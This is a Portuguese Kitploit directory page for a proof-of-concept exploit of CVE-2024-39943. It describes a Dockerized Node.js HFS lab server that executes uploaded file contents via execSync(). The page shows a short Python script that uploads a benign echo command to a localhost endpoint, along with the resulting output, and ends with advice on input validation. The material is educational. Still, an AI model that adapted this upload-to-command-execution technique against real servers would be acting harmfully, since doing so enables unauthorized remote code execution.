Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Node.js-CVE-2024-39943 — Exploit de prova de conceito para CVE-2024-39943, demonstrando execução remota de código via upload de arquivo em um servidor Node.js HFS usando child_process.execSync(). | Kitploit
Ferramentas/GitHubGitHub/jenmrr/node.js-cve-2024-39943
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

Exploit de prova de conceito para CVE-2024-39943, demonstrando execução remota de código via upload de arquivo em um servidor Node.js HFS usando child_process.execSync().

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

Vulnerabilidade de execução de comandos HFS em Node.js (CVE-2024-39943)

Escola WhiteHat 3ª turma – Noh Jeongmin (@JenmrR)


Resumo

Em ambientes de servidor HFS baseados em Node.js, existe uma vulnerabilidade na qual o conteúdo de arquivos enviados é executado por child_process.execSync(). Um atacante pode executar comandos do sistema operacional diretamente através da funcionalidade de upload de arquivos, podendo visualizar resultados de comandos internos do servidor ou controlar o sistema. Esta é uma vulnerabilidade correspondente a CVE-2024-39943, que representa uma ameaça equivalente a injeção de comandos (Remote Code Execution).


Configuração e execução do ambiente

  1. Executar o servidor através do ambiente Docker
  2. O servidor recebe uploads de arquivos no caminho /upload e executa o conteúdo do arquivo enviado diretamente como comando.
  3. O atacante pode realizar RCE através do upload.

Fluxo de execução

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

Resultados

Resposta do servidor após execução do PoC:

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


Conclusão

  • Esta vulnerabilidade é uma típica vulnerabilidade de RCE (Remote Command Execution) que ocorre quando entrada externa é executada como comando do sistema operacional.
  • A maneira de executar diretamente o conteúdo de arquivos enviados usando execSync() causa riscos graves de segurança.
  • A entrada do usuário deve sempre ser validada e não deve ser executada diretamente no servidor.

Baixar ferramenta